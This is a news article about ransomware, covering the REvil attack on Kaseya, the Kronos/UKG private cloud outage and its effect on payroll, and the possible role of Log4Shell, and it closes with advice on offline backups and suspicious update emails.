We first warned readers of the dangers of ransomware in 2007, comparing it to the kidnapping of your data.
If you’ve been a victim of a ransomware attack, the first thing you’ll probably notice is that your system runs much more slowly than it normally does—like “molasses in January,” one victim called it. Next, you’ll see text files appear on your desktop or in the “My Documents” folder. They’re usually entitled “README.TXT” or something similar.
The message will say something like:
“Hello, your files are now securely encrypted using an unbreakable 4096-bit algorithm. If you try to decrypt them, they will be automatically wiped. The only way to decrypt them and avoid their destruction is to purchase our decryption key. The price is 1 BTC. To make payment arrangements send an email message to firstname.lastname@example.org.”
Since 2007, though, there’s been an explosion in documented ransomware attacks. They’ve caused the most damage to organizations that provide software or networking as a service. One high profile attack last July by a Russian-based hacker group calling itself REvil targeted Kaseya, Ltd., a managed service provider (MSP) company that helps its customers maintain their IT infrastructure and end-user systems.
The hackers targeted a Kaseya tool called VSA, used by at least 1,500 businesses and government agencies worldwide to manage digital services for their clients. REvil then encrypted the files of approximately 1,000 of their customers and demanded a ransom payment from each of them. The total ransom REvil received isn’t known, but the criminal gang demanded anywhere from a few thousand dollars to $5 million or more per victim to unlock their files.
But an attack discovered earlier this month dwarfs the Kaseya incursion. It targeted a company called Kronos, which offers “workforce management and human capital management solutions.” Those solutions include scheduling, timekeeping and payroll products called UKC Workforce Central, UKG TeleStaff, Banking Scheduling Solutions, and UKG Healthcare Extensions.
On December 11, Kronos advised its customers, which include Tesla, the PUMA Group, the University of Illinois Health System, Kansas State University, the City of Cleveland, the New York Metropolitan Transportation Authority, and many others, of a “cyber security incident that has disrupted the Kronos Private Cloud.” This is the networking system on which these scheduling, timekeeping and payroll products are deployed.
Kronos then made a startling admission and recommendation:
“Given that it may take up to several weeks to restore system availability, we strongly recommend that you evaluate and implement alternative business continuity protocols related to the affected UKG solutions.”
In communications with individual clients, Kronos acknowledged that the attack “may have compromised employee information like names, addresses, social security numbers, and employee IDs.”
We have been in touch with one of the affected organizations – an institution with several thousand employees. Its chief technology officer acknowledges that for the moment, there is no way to track vacation time or sick time accrued. He also warned that the organization might not be able to provide timely tax forms for employees to file with their tax returns. He added, the organization’s IT is “scouring the internet looking for reports of lost employee data.” And “if we find any evidence that personal information has been compromised, we will share that information with employees.”
An employee of this institution I spoke to about the attack summarized the situation as a “sh*tshow.” He referred to the need to complete a “payroll adjustment form” to reflect holiday and overtime pay and that his manager had warned him it could be “months” before the payroll system was functioning normally.
It’s unclear how Kronos’ servers were infiltrated. The most common way hackers spread ransomware is by embedding an executable file within a poisoned email and then “phishing” with a purchased target list of email addresses. But it’s possible that the hackers who targeted Kronos used a newly discovered vulnerability nicknamed “log4Shell.” The flaw is in a product called the Apache logging library, which is part of some of the world’s most widely used applications and services. Successfully using this vulnerability can give an attacker full control of any targeted system.
Hackers using log4Shell as an attack vector don’t need anyone to click on a poisoned link; they only need to get the target system to log a short piece of code. Hackers can infect a system by sending the code in an email message or setting it as an account username.
Apache released an upgrade to repair the flaw on December 17 and companies worldwide are rushing to incorporate it into their security architecture. Among the companies affected are Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM. The head of the US Cybersecurity and Infrastructure Security Agency referred to the vulnerability as “one of the most serious I’ve seen in my entire career, if not the most serious.”
In the meantime, though, the companies and employees affected by the attack on Kronos don’t have many good options. For at least some its clients, Kronos appears to have offered a 48-hour data restoration guarantee in case of a service outage. Obviously, the company won’t be able to honor it.
Another customer commented on Kronos’ community feed that it was ironic that, “Kronos response to all of us is to implement our organization’s current Business Continuity plan, yet they don’t have one.” Another asked, “Where are the backups, can’t the backups be restored? Are the backups stored in the same ‘cloud/space’ as production?”
These are all valid questions, and also contain the solution for organizations (and individuals) to defend themselves against ransomware and other cyber threats. Namely, back up your data daily and keep those backups offline. An encrypted flash drive is ideal for individuals; tape backups that are physically isolated from any network are one of best solutions for businesses.
What’s more, never respond to emails suggesting software running on your system needs to be updated. Almost any legitimate update will announce itself within the program to be updated, not in an email.
Finally, periodically test your backups and have a step-by-step plan for restoring critical network systems. That way, if your PC, smartphone, or network is ever infected with ransomware, you’ll be ready.